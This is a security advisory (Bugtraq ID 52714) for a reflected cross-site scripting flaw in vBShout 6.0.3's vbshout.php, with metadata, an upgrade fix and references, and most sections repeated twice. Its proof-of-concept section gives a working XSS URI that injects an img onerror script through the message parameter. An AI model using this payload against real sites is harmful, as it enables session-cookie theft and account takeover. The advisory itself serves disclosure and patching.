vBShout 'vbshout.php' Cross Site Scripting Vulnerability
BID:52714
Info
vBShout 'vbshout.php' Cross Site Scripting Vulnerability
| Bugtraq ID: | 52714 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2012 12:00AM |
| Updated: | Mar 26 2012 12:00AM |
| Credit: | Avram Marius Gabriel |
| Vulnerable: |
DragonByte Technologies vBShout 6.0.3 |
| Not Vulnerable: |
DragonByte Technologies vBShout 6.0.4 |
Discussion
vBShout 'vbshout.php' Cross Site Scripting Vulnerability
vBShout is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
vBShout versions prior to 6.0.4 are vulnerable.
vBShout is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
vBShout versions prior to 6.0.4 are vulnerable.
Exploit / POC
vBShout 'vbshout.php' Cross Site Scripting Vulnerability
To exploit this issue, an attacker must entice an unsuspecting user to follow a malicious URI.
The following example URI is available:
http://www.example.com/vbshout.php?message="><textarea><!-- </textarea><img
src=1onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year]
=0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1
To exploit this issue, an attacker must entice an unsuspecting user to follow a malicious URI.
The following example URI is available:
http://www.example.com/vbshout.php?message="><textarea><!-- </textarea><img
src=1onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year]
=0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1
Solution / Fix
vBShout 'vbshout.php' Cross Site Scripting Vulnerability
Solution:
Updates are available. Please see the references for details.
Solution:
Updates are available. Please see the references for details.
References
vBShout 'vbshout.php' Cross Site Scripting Vulnerability
References:
References:
- vBActivity / vBShout / Forumon RPG / vBDownloads / vBQuiz Updates (Security Rel (DragonByte Technologies)
- vBShout Homepage (DragonByte Technologies)
- vBShout v6.0.4 (Security Release) (DragonByte Technologies)